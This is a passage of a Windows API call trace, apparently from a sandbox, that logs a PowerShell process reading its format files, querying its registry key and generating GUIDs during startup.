	[0833.591] ReadFile (in: hFile=0x2f4, lpBuffer=0x343d890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x343d890*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0833.591] ReadFile (in: hFile=0x2f4, lpBuffer=0x343d890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x343d890*, lpNumberOfBytesRead=0x22d378*=0xaca, lpOverlapped=0x0) returned 1
	[0833.591] ReadFile (in: hFile=0x2f4, lpBuffer=0x343cec2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x343cec2*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
	[0833.591] ReadFile (in: hFile=0x2f4, lpBuffer=0x343d890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x343d890*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
	[0833.591] CloseHandle (hObject=0x2f4) returned 1
	[0833.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0833.592] SetErrorMode (uMode=0x1) returned 0x1
	[0833.592] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d320 | out: lpFileInformation=0x22d320*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0833.592] SetErrorMode (uMode=0x1) returned 0x1
	[0833.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0833.592] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d408 | out: phkResult=0x22d408*=0x2f4) returned 0x0
	[0833.592] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d38c, lpData=0x0, lpcbData=0x22d388*=0x0 | out: lpType=0x22d38c*=0x1, lpData=0x0, lpcbData=0x22d388*=0x56) returned 0x0
	[0833.592] CoTaskMemAlloc (cb=0x5a) returned 0x48bac0
	[0833.592] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d35c, lpData=0x48bac0, lpcbData=0x22d358*=0x56 | out: lpType=0x22d35c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d358*=0x56) returned 0x0
	[0833.592] CoTaskMemFree (pv=0x48bac0) 
	[0833.592] RegCloseKey (hKey=0x2f4) returned 0x0
	[0833.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0833.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0833.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x22c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0833.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0833.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x22c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0833.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0835.714] VirtualQuery (in: lpAddress=0x22bea0, lpBuffer=0x22cd60, dwLength=0x30 | out: lpBuffer=0x22cd60*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0835.715] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xe7b14f90, Data2=0xce0d, Data3=0x4e9b, Data4=([0]=0x8c, [1]=0x6d, [2]=0xcb, [3]=0x50, [4]=0xb0, [5]=0xc8, [6]=0x1e, [7]=0xe9))) returned 0x0
	[0835.716] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x2ac12f24, Data2=0x5341, Data3=0x4e96, Data4=([0]=0xac, [1]=0x62, [2]=0x18, [3]=0x0, [4]=0x25, [5]=0x37, [6]=0x9b, [7]=0xd5))) returned 0x0
	[0835.717] VirtualQuery (in: lpAddress=0x22c050, lpBuffer=0x22cf10, dwLength=0x30 | out: lpBuffer=0x22cf10*(BaseAddress=0x22c000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0835.717] VirtualQuery (in: lpAddress=0x22c050, lpBuffer=0x22cf10, dwLength=0x30 | out: lpBuffer=0x22cf10*(BaseAddress=0x22c000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0835.719] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x4264a34a, Data2=0xa572, Data3=0x4934, Data4=([0]=0xa1, [1]=0x13, [2]=0x2d, [3]=0x99, [4]=0xf6, [5]=0x68, [6]=0xaa, [7]=0xf5))) returned 0x0
	[0835.722] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xa0f80b76, Data2=0xf8b9, Data3=0x453e, Data4=([0]=0xb7, [1]=0x6, [2]=0x37, [3]=0xd1, [4]=0xad, [5]=0x39, [6]=0xa6, [7]=0xc9))) returned 0x0
	[0835.722] VirtualQuery (in: lpAddress=0x22c2a0, lpBuffer=0x22d160, dwLength=0x30 | out: lpBuffer=0x22d160*(BaseAddress=0x22c000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0835.723] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x1024833f, Data2=0xa590, Data3=0x4061, Data4=([0]=0x9d, [1]=0x65, [2]=0xb, [3]=0x16, [4]=0xd2, [5]=0xf0, [6]=0xce, [7]=0x3d))) returned 0x0
	[0835.723] VirtualQuery (in: lpAddress=0x22b910, lpBuffer=0x22c7d0, dwLength=0x30 | out: lpBuffer=0x22c7d0*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0835.723] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x77dceb6a, Data2=0x62f2, Data3=0x4141, Data4=([0]=0x93, [1]=0x7e, [2]=0xc0, [3]=0x14, [4]=0xfb, [5]=0xc0, [6]=0xeb, [7]=0x1b))) returned 0x0
	[0835.724] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xa374e9bb, Data2=0xdaba, Data3=0x41f8, Data4=([0]=0xbd, [1]=0x72, [2]=0xd0, [3]=0x32, [4]=0xab, [5]=0x80, [6]=0x5b, [7]=0x41))) returned 0x0
	[0835.724] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0835.724] GetFileType (hFile=0x2f4) returned 0x1
	[0835.724] SetErrorMode (uMode=0x1) returned 0x1
	[0835.724] GetFileType (hFile=0x2f4) returned 0x1
	[0835.724] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.790] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.791] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.791] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.791] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.791] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.791] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.792] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.793] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.794] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.794] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.795] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.795] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.795] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.796] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.796] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.802] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0837.803] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0xbce, lpOverlapped=0x0) returned 1
	[0837.803] ReadFile (in: hFile=0x2f4, lpBuffer=0x34ef5be, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34ef5be*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
	[0837.803] ReadFile (in: hFile=0x2f4, lpBuffer=0x34efe88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x34efe88*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
	[0837.803] CloseHandle (hObject=0x2f4) returned 1
	[0837.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0837.804] SetErrorMode (uMode=0x1) returned 0x1
	[0837.804] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d320 | out: lpFileInformation=0x22d320*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0837.804] SetErrorMode (uMode=0x1) returned 0x1
	[0837.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0837.804] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d408 | out: phkResult=0x22d408*=0x2f4) returned 0x0
	[0837.805] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d38c, lpData=0x0, lpcbData=0x22d388*=0x0 | out: lpType=0x22d38c*=0x1, lpData=0x0, lpcbData=0x22d388*=0x56) returned 0x0
	[0837.805] CoTaskMemAlloc (cb=0x5a) returned 0x1b9e8310
	[0837.805] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d35c, lpData=0x1b9e8310, lpcbData=0x22d358*=0x56 | out: lpType=0x22d35c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d358*=0x56) returned 0x0
	[0837.805] CoTaskMemFree (pv=0x1b9e8310) 
	[0837.805] RegCloseKey (hKey=0x2f4) returned 0x0
	[0837.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0837.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0837.806] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x1010cfad, Data2=0xa45c, Data3=0x4c29, Data4=([0]=0x81, [1]=0x4e, [2]=0xd2, [3]=0x78, [4]=0xbd, [5]=0xcf, [6]=0x4, [7]=0xae))) returned 0x0
	[0837.807] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x2a7ecc56, Data2=0xbc36, Data3=0x4610, Data4=([0]=0x94, [1]=0xcd, [2]=0xd1, [3]=0xca, [4]=0x55, [5]=0x9f, [6]=0xef, [7]=0xf6))) returned 0x0
	[0837.807] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x4568694b, Data2=0x645a, Data3=0x496d, Data4=([0]=0xa4, [1]=0xaf, [2]=0x64, [3]=0xa1, [4]=0x92, [5]=0x3e, [6]=0x33, [7]=0x82))) returned 0x0
	[0837.807] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xdc454d1b, Data2=0x1d49, Data3=0x478a, Data4=([0]=0xa7, [1]=0xa, [2]=0x17, [3]=0xb8, [4]=0xae, [5]=0x1a, [6]=0x6e, [7]=0xbd))) returned 0x0
	[0837.807] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x898124cd, Data2=0x4c34, Data3=0x43c2, Data4=([0]=0xb1, [1]=0xcd, [2]=0x52, [3]=0x93, [4]=0xc0, [5]=0xa1, [6]=0xb9, [7]=0x16))) returned 0x0
	[0837.807] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xae3a9c7d, Data2=0xe7fe, Data3=0x4343, Data4=([0]=0xae, [1]=0xac, [2]=0xad, [3]=0x23, [4]=0xbf, [5]=0x32, [6]=0x5a, [7]=0xad))) returned 0x0
	[0837.807] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xa5ae3d33, Data2=0xdc1, Data3=0x4da3, Data4=([0]=0xb6, [1]=0x7c, [2]=0xbd, [3]=0xf6, [4]=0x77, [5]=0x2b, [6]=0x77, [7]=0xf4))) returned 0x0
	[0837.808] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xcfcdd1a6, Data2=0xbdb3, Data3=0x48ab, Data4=([0]=0xac, [1]=0xdd, [2]=0x34, [3]=0x4a, [4]=0xda, [5]=0x50, [6]=0x54, [7]=0x10))) returned 0x0
	[0837.808] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x4bbedb02, Data2=0xace7, Data3=0x4386, Data4=([0]=0xac, [1]=0x8c, [2]=0x47, [3]=0x7e, [4]=0x6f, [5]=0x7e, [6]=0x44, [7]=0x17))) returned 0x0
	[0837.808] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xc3b2806, Data2=0x3db1, Data3=0x4d6c, Data4=([0]=0xbf, [1]=0x76, [2]=0x9d, [3]=0x60, [4]=0xa5, [5]=0xb5, [6]=0xf5, [7]=0x12))) returned 0x0
	[0837.808] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xa32afdf4, Data2=0x8ac8, Data3=0x4721, Data4=([0]=0xaf, [1]=0xa8, [2]=0xee, [3]=0x2f, [4]=0x5c, [5]=0x62, [6]=0x91, [7]=0xf3))) returned 0x0
	[0837.808] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x94bdb5b6, Data2=0xd83a, Data3=0x4617, Data4=([0]=0x87, [1]=0x43, [2]=0x7e, [3]=0xc3, [4]=0x1f, [5]=0xaa, [6]=0x78, [7]=0x46))) returned 0x0
	[0837.809] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x457cf00e, Data2=0xfe12, Data3=0x436b, Data4=([0]=0xae, [1]=0xb1, [2]=0x3b, [3]=0xf1, [4]=0xc, [5]=0x70, [6]=0x9a, [7]=0x83))) returned 0x0
	[0837.809] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x8b7225f8, Data2=0x1bb2, Data3=0x476c, Data4=([0]=0xb0, [1]=0xaf, [2]=0x30, [3]=0x32, [4]=0x13, [5]=0x4a, [6]=0x23, [7]=0x83))) returned 0x0
	[0837.809] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xed5b8512, Data2=0xdfc8, Data3=0x493e, Data4=([0]=0xbb, [1]=0x96, [2]=0xd7, [3]=0xcd, [4]=0xe7, [5]=0x5c, [6]=0x87, [7]=0x59))) returned 0x0
	[0837.809] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x70953600, Data2=0x6708, Data3=0x47e9, Data4=([0]=0x90, [1]=0x14, [2]=0x58, [3]=0x75, [4]=0x47, [5]=0xbb, [6]=0xc6, [7]=0x5e))) returned 0x0
	[0837.809] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x144f29be, Data2=0x3651, Data3=0x49c2, Data4=([0]=0xb6, [1]=0x9f, [2]=0xec, [3]=0x25, [4]=0x5c, [5]=0xa1, [6]=0x1e, [7]=0x6))) returned 0x0
	[0837.809] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xb483f26a, Data2=0xac06, Data3=0x4d36, Data4=([0]=0xa5, [1]=0x38, [2]=0x6f, [3]=0x61, [4]=0x9f, [5]=0x5c, [6]=0x47, [7]=0xa3))) returned 0x0
	[0837.809] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x7a37337d, Data2=0xe041, Data3=0x460c, Data4=([0]=0xb8, [1]=0xd, [2]=0xcb, [3]=0xa3, [4]=0xf9, [5]=0x3a, [6]=0x9f, [7]=0x85))) returned 0x0
	[0837.810] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x68ae812d, Data2=0x5736, Data3=0x4bd3, Data4=([0]=0xbb, [1]=0xe2, [2]=0x2a, [3]=0xc4, [4]=0x49, [5]=0x64, [6]=0x7d, [7]=0x6a))) returned 0x0
	[0837.810] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xe01f7a68, Data2=0x3849, Data3=0x4bb5, Data4=([0]=0xb7, [1]=0xc5, [2]=0x60, [3]=0xd1, [4]=0x48, [5]=0xe8, [6]=0xfb, [7]=0x70))) returned 0x0
	[0837.810] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x1c3ac5aa, Data2=0x299c, Data3=0x4d99, Data4=([0]=0xb6, [1]=0x5f, [2]=0x7d, [3]=0x1d, [4]=0x77, [5]=0x59, [6]=0x2a, [7]=0x0))) returned 0x0
	[0837.810] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x66044b69, Data2=0x175c, Data3=0x4d65, Data4=([0]=0x9c, [1]=0x59, [2]=0xeb, [3]=0xc5, [4]=0x8e, [5]=0xce, [6]=0x2, [7]=0xbb))) returned 0x0
	[0837.810] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xe7d2d7b4, Data2=0xa91, Data3=0x4b6b, Data4=([0]=0x9d, [1]=0x8b, [2]=0xb6, [3]=0x8c, [4]=0x44, [5]=0x25, [6]=0xb7, [7]=0x9d))) returned 0x0
	[0837.811] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xbfc5353, Data2=0xbef0, Data3=0x432e, Data4=([0]=0xa6, [1]=0x19, [2]=0x9f, [3]=0x7b, [4]=0x57, [5]=0x37, [6]=0xd, [7]=0x3e))) returned 0x0
	[0837.811] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xbdfa725b, Data2=0xb72c, Data3=0x446a, Data4=([0]=0x9e, [1]=0x9b, [2]=0x8b, [3]=0x92, [4]=0xf4, [5]=0xc6, [6]=0x8c, [7]=0x35))) returned 0x0
	[0837.811] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xc26631d, Data2=0x71c4, Data3=0x4bf7, Data4=([0]=0xa9, [1]=0x2f, [2]=0x5f, [3]=0xd3, [4]=0x1c, [5]=0x4d, [6]=0xdd, [7]=0xb4))) returned 0x0
	[0837.812] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x9dcefa3e, Data2=0x4b49, Data3=0x4209, Data4=([0]=0xad, [1]=0x19, [2]=0x83, [3]=0xdf, [4]=0x83, [5]=0xa0, [6]=0xe, [7]=0x13))) returned 0x0
	[0837.812] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xa34277cd, Data2=0x967, Data3=0x46c0, Data4=([0]=0xa4, [1]=0x15, [2]=0xaa, [3]=0x21, [4]=0x2a, [5]=0x90, [6]=0x23, [7]=0xc6))) returned 0x0
	[0837.812] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x44042eb5, Data2=0xd7ce, Data3=0x44d0, Data4=([0]=0xbd, [1]=0x25, [2]=0x71, [3]=0xfe, [4]=0xf3, [5]=0x3f, [6]=0x67, [7]=0xeb))) returned 0x0
	[0837.815] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x2de5383b, Data2=0x184e, Data3=0x4901, Data4=([0]=0x99, [1]=0x37, [2]=0x8e, [3]=0xb5, [4]=0x8f, [5]=0x11, [6]=0x6c, [7]=0x6))) returned 0x0
